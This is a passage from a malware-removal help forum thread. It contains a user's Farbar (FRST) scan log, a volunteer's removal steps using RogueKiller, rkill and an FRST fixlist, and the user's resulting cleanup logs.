R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
U3 alspgeyc; C:\Windows\System32\Drivers\alspgeyc.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-19 19:58 - 2018-03-19 20:33 - 000000000 ____D C:\ProgramData\RogueKiller
2018-03-19 19:58 - 2018-03-19 19:58 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2018-03-19 19:57 - 2018-03-19 19:57 - 000000867 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\Program Files\RogueKiller
2018-03-18 09:03 - 2018-03-19 20:35 - 000000000 ____D C:\FRST
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:21 - 2018-03-19 19:52 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-19 16:55 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:11 - 2018-03-19 19:52 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:14 - 2018-03-19 16:50 - 001422732 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-19 20:07 - 2013-11-14 20:32 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA Corporation
2018-03-19 20:07 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-19 19:52 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-19 19:52 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-19 16:56 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-19 16:56 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-19 16:51 - 2014-10-08 23:05 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Temp
2018-03-19 16:50 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals
2018-02-17 14:54 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2018-02-17 13:46 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\AppCompat

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

Some files in TEMP:
====================
2018-03-19 19:58 - 2018-01-12 17:33 - 001665384 _____ (Microsoft Corporation) C:\Users\Martin\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================



#6 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:09 PM

Posted 20 March 2018 - 07:50 AM

Hi,

Run the RogueKiller tool and delete these items.

¤¤¤ Tasks : 1 ¤¤¤
[Hj.Shortcut] \{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} -- "c:\program files (x86)\mozilla firefox\firefox.exe" (http://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin) -> Found

¤¤¤ Files : 1 ¤¤¤
[Root.Wajam][File] C:\Windows\System32\drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys -> Found

===

Please download and run the following tool to help allow other programs to run. (courtesy of BleepingComputer.com)
There are 3 different versions. If one of them won't run then download and try to run the other one.
Vista and Win7 users need to right click and choose Run as Admin
You only need to get one of them to run, not all of them.

rkill.exe
rkill.com
rkill.scr

It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested on another computer and then transfer them to the desktop of the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.

When completed it will create a log. Please post the content on your next reply.
===

The files we are trying to delete may be protected.
Boot your computer to Save Mode.

Run the CMD.exe and run it as an administrator.
Delete these files in bold if still present.
C:\Windows\System32\drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys

Please let me know what problem persists with this computer.
C:\Windows\System32\Drivers\alspgeyc.sys

===

Type EXIT at the DOS prompt to return to the Operating System.

Restart the computer in normal mode.

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.


Start

CreateRestorePoint:
CloseProcesses:

U3 alspgeyc; C:\Windows\System32\Drivers\alspgeyc.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)
C:\Windows\System32\Drivers\alspgeyc.sys

Reboot:

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.

===

Run the Farbar program and post a fresh FRST.txt log.

Let me know what problem persists.

#7 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 20 March 2018 - 11:12 AM

Hello! Thanks again for helping me.

I have done as you instructed in the order you typed it, i.e. RogueKiller -> rkill.exe -> CMD -> FRST-fix ->FRST-scan

 

However, there where some things which I did not manage to fully do:

When opening RogueKiller, I could only find [Root.Wajam][File] C:\Windows\System32\drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys, which was located under Quarantine in the History tab. I deleted it, but the other file was not there, so I could not do anything with it.

 

When trying to delete the two files with cmd.exe in fail safe, I got the prompt that the files could not be found. I tried to delete them by going to the correct folder C:\Windows\System32\Drivers\ and typing "del alspgeyc.sys" and "del ddd6ebd91f4ecf7d7f74107288edb1a0.sys" respectively, but neither file was present, so I could not delete them.

 

Other than that, everything went according to your instruction, as far as I could tell. Still got the "Failed to update(1)" prompt every time I launched FRST though.

 

Here are the logs (rkill-log, fixlog, and frst-log):

 

Rkill 2.9.1 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2018 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 03/20/2018 04:52:52 PM in x64 mode.
Windows Version: Windows 7 Ultimate Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * No malware processes found to kill.

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * No issues found.

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * No issues found.

Program finished at: 03/20/2018 04:53:07 PM
Execution time: 0 hours(s), 0 minute(s), and 14 seconds(s)
 

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (20-03-2018 17:01:23) Run:3
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CreateRestorePoint:
CloseProcesses:

U3 alspgeyc; C:\Windows\System32\Drivers\alspgeyc.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)
C:\Windows\System32\Drivers\alspgeyc.sys

Reboot:

End
*****************

Error: (0) Failed to create a restore point.
Processes closed successfully.
alspgeyc => service not found.
"C:\Windows\System32\Drivers\alspgeyc.sys" => not found


The system needed a reboot.

==== End of Fixlog 17:01:23 ====

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (20-03-2018 17:02:41)
Running from D:\User profile\Desktop
